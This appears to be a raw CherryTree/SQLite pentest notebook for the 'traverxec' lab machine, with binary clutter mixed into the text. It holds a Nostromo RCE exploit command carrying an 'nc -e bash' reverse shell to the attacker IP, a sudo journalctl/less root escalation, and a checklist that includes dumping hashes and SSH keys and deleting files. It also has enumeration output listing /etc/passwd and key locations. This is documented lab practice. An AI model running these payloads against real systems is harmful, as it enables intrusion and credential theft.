SQLite format 3@ V-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*Auk!' 10.10.10.Xcustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&n%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*Aum!' 10.10.10.Xcustom-colorsAu* J jjLm'  Niktocustom-colors$A?&oA?&$%q'  Web Services cat nhttpd.conf # MAIN [MANDATORY] servername traverxec.htb serverlisten * serveradmin david@traverxec.htb serverroot /var/nostromo servermimes conf/mimes docroot /var/nostromo/htdocs docindex index.html # LOGS [OPTIONAL] logpid logs/nhttpd.pid # SETUID [RECOMMENDED] user www-data # BASIC AUTHENTICATION [OPTIONAL] htaccess .htaccess htpasswd /var/nostromo/conf/.htpasswd # ALIASES [OPTIONAL] /icons /var/nostromo/icons # HOMEDIRS [OPTIONAL] homedirs /home homedirs_public public_www custom-colors"A j ;bv)'  Script Resultl'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Adk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xAu/P kk%M'  ExploitationService Exploited: Nostromo 1.9.6 Vulnerability Type: RCE Exploit POC: https://www.exploit-db.com/exploits/47837 Description: Discovery of Vulnerability nmap Exploit Code Used python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.7 4444" Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A  OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg cc0Q++y'   Priv EscalationService Exploited: less Pager Vulnerability Type: GTFObin Exploit POC: Description: Scheduled Tasks server-stats.sh david@traverxec:~/bin$ cat server-stats.sh #!/bin/bash cat /home/david/bin/server-stats.head echo "Load: `/usr/bin/uptime`" echo " " echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`" echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`" echo " " echo "Last 5 journal log lines:" /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/catcustom-colors$A)& iiS8C//'  Proof\Flags\OtherService Exploited: less Pager Vulnerability Type: GTFObin Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Shrink Window, run /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service, expand window, type !/bin/bash and hit Enter Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsA^g'  Goodiescustom-colorsVA?& cich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree custom-colorsAѺc h  ' Log Bookcustom-colors(AI^information: Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.19.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) [-] Specific release information: PRETTY_NAME="Debian GNU/Linux 10 (buster)" NAME="Debian GNU/Linux" VERSION_ID="10" VERSION="10 (buster)" VERSION_CODENAME=buster ID=debian HOME_URL="https://www.debian.org/" SUPPORT_URL="https://www.debian.org/support" BUG_REPORT_URL="https://bugs.debian.org/" [-] Hostname: traverxec ### USER/GROUP ########################################## [-] Current user/group info: uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) [-] Users that have previously logged onto the system: Username Port From Latest root tty1 Thu Nov 21 04:25:58 -0500 2019 david pts/1 10.10.14.7 Wed Aug 26 23:33:00 -0400 2020 [-] Who else is logged on: 23:36:59 up 35 min, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT david pts/1 10.10.14.7 23:33 3.00s 0.03s 0.00s /bin/bash ./LinEnum.sh -t [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync) uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network) uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve) uid=104(messagebus) gid=110(messagebus) groups=110(messagebus) uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin david:x:1000:1000:david,,,:/home/david:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin [-] Super user account(s): root [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Oct 25 2019 . drwxr-xr-x 18 root root 4.0K Oct 25 2019 .. drwx--x--x 5 david david 4.0K Aug 26 23:36 david [-] Files owned by our user: -rwxr-xr-x 1 david david 46631 Jul 13 14:54 /home/david/LinEnum.sh -rw-r--r-- 1 david david 5059 Aug 26 23:37 /home/david/output.txt -rw-r--r-- 1 david david 807 Oct 25 2019 /home/david/.profile -rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/authorized_keys -rw------- 1 david david 1766 Oct 25 2019 /home/david/.ssh/id_rsa -rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/id_rsa.pub -rw-r--r-- 1 david david 402 Oct 25 2019 /home/david/public_www/index.html -rw-r--r-- 1 david david 1915 Oct 25 2019 /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz -rw-r--r-- 1 david david 45 Oct 25 2019 /home/david/public_www/protected-file-area/.htaccess -rwx------ 1 david david 363 Oct 25 2019 /home/david/bin/server-stats.sh -r-------- 1 david david 802 Oct 25 2019 /home/david/bin/server-stats.head -rw-r--r-- 1 david david 220 Oct 25 2019 /home/david/.bash_logout -rw-r--r-- 1 david david 3526 Oct 25 2019 /home/david/.bashrc [-] Hidden files: -rw-r--r-- 1 root root 0 Aug 26 23:01 /run/network/.ifstate.lock -rw-r--r-- 1 david david 807 Oct 25 2019 /home/david/.profile -rw-r--r-- 1 david david 45 Oct 25 2019 /home/david/public_www/protected-file-area/.htaccess -rw-r--r-- 1 david david 220 Oct 25 2019 /home/david/.bash_logout -rw-r--r-- 1 david david 3526 Oct 25 2019 /home/david/.bashrc -rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.d/.placeholder -rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.monthly/.placeholder -rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.daily/.placeholder -rw-r--r-- 1 root root 807 Apr 18 2019 /etc/skel/.profile -rw-r--r-- 1 root root 220 Apr 18 2019 /etc/skel/.bash_logout -rw-r--r-- 1 root root 3526 Apr 18 2019 /etc/skel/.bashrc -rw------- 1 root root 0 Oct 25 2019 /etc/.pwd.lock -rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.weekly/.placeholder -rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.hourly/.placeholder -rw-r--r-- 1 root root 0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch -rw-r--r-- 1 root bin 41 Oct 25 2019 /var/nostromo/conf/.htpasswd [-] World-readable files within /home: -rwxr-xr-x 1 david david 46631 Jul 13 14:54 /home/da vid/LinEnum.sh -rw-r--r-- 1 david david 7198 Aug 26 23:37 /home/david/output.txt -rw-r--r-- 1 david david 807 Oct 25 2019 /home/david/.profile -rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/authorized_keys -rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/id_rsa.pub -rw-r--r-- 1 david david 402 Oct 25 2019 /home/david/public_www/index.html -rw-r--r-- 1 david david 1915 Oct 25 2019 /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz -rw-r--r-- 1 david david 45 Oct 25 2019 /home/david/public_www/protected-file-area/.htaccess -rw-r--r-- 1 david david 220 Oct 25 2019 /home/david/.bash_logout -rw-r--r-- 1 david david 3526 Oct 25 2019 /home/david/.bashrc [-] Home directory contents: total 92K drwx--x--x 5 david david 4.0K Aug 26 23:36 . drwxr-xr-x 3 root root 4.0K Oct 25 2019 .. lrwxrwxrwx 1 root root 9 Oct 25 2019 .bash_history -> /dev/null -rw-r--r-- 1 david david 220 Oct 25 2019 .bash_logout -rw-r--r-- 1 david david 3.5K Oct 25 201!9 .bashrc drwx------ 2 david david 4.0K Oct 25 2019 bin -rwxr-xr-x 1 david david 46K Jul 13 14:54 LinEnum.sh -rw-r--r-- 1 david david 7.9K Aug 26 23:37 output.txt -rw-r--r-- 1 david david 807 Oct 25 2019 .profile drwxr-xr-x 3 david david 4.0K Oct 25 2019 public_www drwx------ 2 david david 4.0K Oct 25 2019 .ssh -r--r----- 1 root david 33 Oct 25 2019 user.txt [-] SSH keys/host information found in the following locations: -rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/authorized_keys -rw------- 1 david david 1766 Oct 25 2019 /home/david/.ssh/id_rsa -rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/id_rsa.pub ### ENVIRONMENTAL ####################################### [-] Environment information: SHELL=/bin/bash PWD=/home/david LOGNAME=david XDG_SESSION_TYPE=tty HOME=/home/david LANG=en_US.UTF-8 SSH_CONNECTION=10.10.14.7 45374 10.10.10.165 22 XDG_SESSION_CLASS=user TERM=xterm-256color USER=david SHLVL=1 XDG_SESSION_ID=2 XDG_RUNTIME_DIR"=/run/user/1000 SSH_CLIENT=10.10.14.7 45374 22 PATH=/home/david/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games MAIL=/var/mail/david SSH_TTY=/dev/pts/1 _=/usr/bin/env [-] Path information: /home/david/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games lrwxrwxrwx 1 root root 7 Oct 25 2019 /bin -> usr/bin drwx------ 2 david david 4096 Oct 25 2019 /home/david/bin drwxr-xr-x 2 root root 20480 Nov 12 2019 /usr/bin drwxr-xr-x 2 root root 4096 May 13 2019 /usr/games drwxr-xr-x 2 root root 4096 Oct 25 2019 /usr/local/bin drwxr-xr-x 2 root root 4096 Oct 25 2019 /usr/local/games [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/bash /usr/bin/bash /bin/rbash /usr/bin/rbash /bin/dash /usr/bin/dash [-] Current umask value: 0022 u=rwx,g=rx,o=rx [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 P#ASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 1042 Jun 23 2019 /etc/crontab /etc/cron.d: total 12 drwxr-xr-x 2 root root 4096 Oct 25 2019 . drwxr-xr-x 73 root root 4096 Nov 12 2019 .. -rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder /etc/cron.daily: total 36 drwxr-xr-x 2 root root 4096 Oct 25 2019 . drwxr-xr-x 73 root root 4096 Nov 12 2019 .. -rwxr-xr-x 1 root root 1478 May 28 2019 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1187 Apr 18 2019 dpkg -rwxr-xr-x 1 root root 377 Aug 28 2018 logrotate -rwxr-xr-x 1 root root 1123 Feb 10 2019 man-db -rwxr-xr-x 1 root root 249 Sep 27 2017 passwd -rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Oct 25 2019 . drwxr-xr-x 73 root root 4096 Nov 12 2019 .. -rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder /etc/cron.mo$nthly: total 12 drwxr-xr-x 2 root root 4096 Oct 25 2019 . drwxr-xr-x 73 root root 4096 Nov 12 2019 .. -rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder /etc/cron.weekly: total 16 drwxr-xr-x 2 root root 4096 Oct 25 2019 . drwxr-xr-x 73 root root 4096 Nov 12 2019 .. -rwxr-xr-x 1 root root 813 Feb 10 2019 man-db -rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) %OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Thu 2020-08-27 00:00:00 EDT 22min left Wed 2020-08-26 23:01:55 EDT 35min ago logrotate.timer logrotate.service Thu 2020-08-27 00:00:00 EDT 22min left Wed 2020-08-26 23:01:55 EDT 35min ago man-db.timer man-db.service Thu 2020-08-27 06:08:05 EDT 6h left Wed 2020-08-26 23:01:55 EDT 35min ago apt-daily-upgrade.timer apt-daily-upgrade.service Thu 2020-08-&27 06:43:28 EDT 7h left Wed 2020-08-26 23:01:55 EDT 35min ago apt-daily.timer apt-daily.service Thu 2020-08-27 23:16:55 EDT 23h left Wed 2020-08-26 23:16:55 EDT 20min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service 5 timers listed. ### NETWORKING ########################################## [-] Network and IP info: 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000 link/ether 00:50:56:b9:87:37 brd ff:ff:ff:ff:ff:ff inet 10.10.10.165/24 brd 10.10.10.255 scope global eth0 valid_lft forever preferred_lft forever [-] ARP history: 10.10.10.2 dev eth0 lladdr 00:50:56:b9:f9:ab REACHABLE [-] Nameserver(s): na'meserver 10.211.55.1 [-] Default route: default via 10.10.10.2 dev eth0 onlink [-] Listening TCP: State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 128 0.0.0.0:80 0.0.0.0:* LISTEN 0 128 0.0.0.0:22 0.0.0.0:* LISTEN 0 128 [::]:22 [::]:* [-] Listening UDP: State Recv-Q Send-Q Local Address:Port Peer Address:Port ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.9 103784 10004 ? Ss 23:01 0:01 /sbin/init root 2 0.0 0.0 0 0 ? S 23:01 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? I< 23:01 0:00 [rcu_gp] root 4 0.0 0.0 0 0 ? ( I< 23:01 0:00 [rcu_par_gp] root 6 0.0 0.0 0 0 ? I< 23:01 0:00 [kworker/0:0H-kblockd] root 7 0.0 0.0 0 0 ? I 23:01 0:00 [kworker/u2:0-events_unbound] root 8 0.0 0.0 0 0 ? I< 23:01 0:00 [mm_percpu_wq] root 9 0.0 0.0 0 0 ? S 23:01 0:00 [ksoftirqd/0] root 10 0.0 0.0 0 0 ? I 23:01 0:00 [rcu_sched] root 11 0.0 0.0 0 0 ? I 23:01 0:00 [rcu_bh] root 12 0.0 0.0 0 0 ? S 23:01 0:00 [migration/0] root 14 0.0 0.0 0 0 ? S 23:01 0:00 [cpuhp/0] root 15 0.0 0.0 0 0 ? S 23:01 0:00 [kdevtmpfs] root 16 0.0 0.0 0 0 ? I< 23:01 0:00 [netns] root 17 0.0 0.0 0 0 ? S 23:01 0:00 [kauditd] root 18 0.0 0.0 0 0 ? S 23:01 0:00 [khungtaskd] root 19 0.0 ) 0.0 0 0 ? S 23:01 0:00 [oom_reaper] root 20 0.0 0.0 0 0 ? I< 23:01 0:00 [writeback] root 21 0.0 0.0 0 0 ? S 23:01 0:00 [kcompactd0] root 22 0.0 0.0 0 0 ? SN 23:01 0:00 [ksmd] root 23 0.0 0.0 0 0 ? SN 23:01 0:00 [khugepaged] root 24 0.0 0.0 0 0 ? I< 23:01 0:00 [crypto] root 25 0.0 0.0 0 0 ? I< 23:01 0:00 [kintegrityd] root 26 0.0 0.0 0 0 ? I< 23:01 0:00 [kblockd] root 27 0.0 0.0 0 0 ? I< 23:01 0:00 [edac-poller] root 28 0.0 0.0 0 0 ? I< 23:01 0:00 [devfreq_wq] root 29 0.0 0.0 0 0 ? S 23:01 0:00 [watchdogd] root 30 0.0 0.0 0 0 ? S 23:01 0:00 [kswapd0] root 48 0.0 0.0 0 0 ? I< 23:01 0:00 [kthrotld] root 49 0.0 0.*0 0 0 ? S 23:01 0:00 [irq/24-pciehp] root 50 0.0 0.0 0 0 ? S 23:01 0:00 [irq/25-pciehp] root 51 0.0 0.0 0 0 ? S 23:01 0:00 [irq/26-pciehp] root 52 0.0 0.0 0 0 ? S 23:01 0:00 [irq/27-pciehp] root 53 0.0 0.0 0 0 ? S 23:01 0:00 [irq/28-pciehp] root 54 0.0 0.0 0 0 ? S 23:01 0:00 [irq/29-pciehp] root 55 0.0 0.0 0 0 ? S 23:01 0:00 [irq/30-pciehp] root 56 0.0 0.0 0 0 ? S 23:01 0:00 [irq/31-pciehp] root 57 0.0 0.0 0 0 ? S 23:01 0:00 [irq/32-pciehp] root 58 0.0 0.0 0 0 ? S 23:01 0:00 [irq/33-pciehp] root 59 0.0 0.0 0 0 ? S 23:01 0:00 [irq/34-pciehp] root 60 0.0 0.0 0 0 ? S 23:01 0:00 [irq/35-pciehp] root 61 0.0 0.0 0 0 ? S 23:01 0:00 [irq/3+6-pciehp] root 62 0.0 0.0 0 0 ? S 23:01 0:00 [irq/37-pciehp] root 63 0.0 0.0 0 0 ? S 23:01 0:00 [irq/38-pciehp] root 64 0.0 0.0 0 0 ? S 23:01 0:00 [irq/39-pciehp] root 65 0.0 0.0 0 0 ? S 23:01 0:00 [irq/40-pciehp] root 66 0.0 0.0 0 0 ? S 23:01 0:00 [irq/41-pciehp] root 67 0.0 0.0 0 0 ? S 23:01 0:00 [irq/42-pciehp] root 68 0.0 0.0 0 0 ? S 23:01 0:00 [irq/43-pciehp] root 69 0.0 0.0 0 0 ? S 23:01 0:00 [irq/44-pciehp] root 70 0.0 0.0 0 0 ? S 23:01 0:00 [irq/45-pciehp] root 71 0.0 0.0 0 0 ? S 23:01 0:00 [irq/46-pciehp] root 72 0.0 0.0 0 0 ? S 23:01 0:00 [irq/47-pciehp] root 73 0.0 0.0 0 0 ? S 23:01 0:00 [irq/48-pciehp] root 74 0.0 0.0 0 0 ,? S 23:01 0:00 [irq/49-pciehp] root 75 0.0 0.0 0 0 ? S 23:01 0:00 [irq/50-pciehp] root 76 0.0 0.0 0 0 ? S 23:01 0:00 [irq/51-pciehp] root 77 0.0 0.0 0 0 ? S 23:01 0:00 [irq/52-pciehp] root 78 0.0 0.0 0 0 ? S 23:01 0:00 [irq/53-pciehp] root 79 0.0 0.0 0 0 ? S 23:01 0:00 [irq/54-pciehp] root 80 0.0 0.0 0 0 ? S 23:01 0:00 [irq/55-pciehp] root 81 0.0 0.0 0 0 ? I< 23:01 0:00 [ipv6_addrconf] root 83 0.0 0.0 0 0 ? I 23:01 0:00 [kworker/u2:1-events_unbound] root 92 0.0 0.0 0 0 ? I< 23:01 0:00 [kstrp] root 128 0.0 0.0 0 0 ? I< 23:01 0:00 [ata_sff] root 129 0.0 0.0 0 0 ? I< 23:01 0:00 [mpt_poll_0] root 130 0.0 0.0 0 0 ? S 23:01 0:00 [scsi_eh_0] -root 131 0.0 0.0 0 0 ? I< 23:01 0:00 [mpt/0] root 132 0.0 0.0 0 0 ? I< 23:01 0:00 [scsi_tmf_0] root 133 0.0 0.0 0 0 ? S 23:01 0:00 [scsi_eh_1] root 134 0.0 0.0 0 0 ? I< 23:01 0:00 [scsi_tmf_1] root 184 0.0 0.0 0 0 ? I< 23:01 0:00 [kworker/0:1H-kblockd] root 187 0.0 0.0 0 0 ? S 23:01 0:00 [scsi_eh_2] root 188 0.0 0.0 0 0 ? I< 23:01 0:00 [scsi_tmf_2] root 216 0.0 0.0 0 0 ? I< 23:01 0:00 [kworker/u3:0] root 218 0.0 0.0 0 0 ? S 23:01 0:00 [jbd2/sda1-8] root 219 0.0 0.0 0 0 ? I< 23:01 0:00 [ext4-rsv-conver] root 251 0.0 0.8 32184 8236 ? Ss 23:01 0:00 /lib/systemd/systemd-journald root 268 0.0 0.4 21920 4960 ? Ss 23:01 0:00 /lib/systemd/systemd-udevd root 354 0.0 .0.0 0 0 ? I< 23:01 0:00 [ttm_swap] root 355 0.0 0.0 0 0 ? S 23:01 0:00 [irq/16-vmwgfx] systemd+ 408 0.0 0.6 93080 6524 ? Ssl 23:01 0:00 /lib/systemd/systemd-timesyncd root 410 0.0 0.2 8476 2644 ? Ss 23:01 0:00 /usr/sbin/cron -f root 414 0.0 0.7 19388 7296 ? Ss 23:01 0:00 /lib/systemd/systemd-logind message+ 417 0.0 0.4 9076 4416 ? Ss 23:01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only www-data 420 0.0 0.2 7948 2364 ? S 23:01 0:00 /usr/local/sbin/nhttpd root 423 0.0 0.1 5612 1652 tty1 Ss+ 23:01 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux root 424 0.0 0.6 15852 7036 ? Ss 23:01 0:00 /usr/sbin/sshd -D root 583 0.0 1.1 152648 11688 ? Sl 23:01 0:01 /usr/sbin/vmtoolsd root 631 0.0 1.0 38660 10340 ? S 23:01 0:00 /usr/lib//vmware-vgauth/VGAuthService -s www-data 735 0.0 0.2 3736 2836 ? S 23:06 0:00 bash www-data 752 0.0 0.6 12340 6944 ? S 23:07 0:00 python -c import pty; pty.spawn("/bin/bash") www-data 753 0.0 0.3 3868 3280 pts/0 Ss+ 23:07 0:00 /bin/bash root 772 0.0 0.0 0 0 ? I 23:22 0:00 [kworker/0:0-ata_sff] root 775 0.0 0.0 0 0 ? I 23:27 0:00 [kworker/0:2-ata_sff] root 776 0.0 0.8 16896 8276 ? Ss 23:32 0:00 sshd: david [priv] david 779 0.0 0.8 21020 8536 ? Ss 23:32 0:00 /lib/systemd/systemd --user david 780 0.0 0.2 104952 2264 ? S 23:32 0:00 (sd-pam) david 788 0.0 0.4 16896 4904 ? S 23:32 0:00 sshd: david@pts/1 david 789 0.0 0.4 8240 4992 pts/1 Ss 23:32 0:00 -bash root 792 0.0 0.0 0 0 ? I 23:33 0:00 [kworker/0:1-events] david 805 0.0 0.3 7568 3876 pts/1 S+ 23:36 0 0:00 /bin/bash ./LinEnum.sh -t david 806 0.0 0.3 7568 3336 pts/1 S+ 23:36 0:00 /bin/bash ./LinEnum.sh -t david 807 0.0 0.0 5264 748 pts/1 S+ 23:36 0:00 tee -a root 893 0.0 0.2 21920 2300 ? S 23:37 0:00 /lib/systemd/systemd-udevd david 1042 0.0 0.2 7568 2584 pts/1 S+ 23:37 0:00 /bin/bash ./LinEnum.sh -t david 1043 0.0 0.3 10632 3240 pts/1 R+ 23:37 0:00 ps aux [-] Process binaries and associated permissions (from above list): 1.2M -rwxr-xr-x 1 root root 1.2M Apr 18 2019 /bin/bash 1.5M -rwxr-xr-x 1 root root 1.5M Aug 20 2019 /lib/systemd/systemd 144K -rwxr-xr-x 1 root root 143K Aug 20 2019 /lib/systemd/systemd-journald 228K -rwxr-xr-x 1 root root 227K Aug 20 2019 /lib/systemd/systemd-logind 56K -rwxr-xr-x 1 root root 55K Aug 20 2019 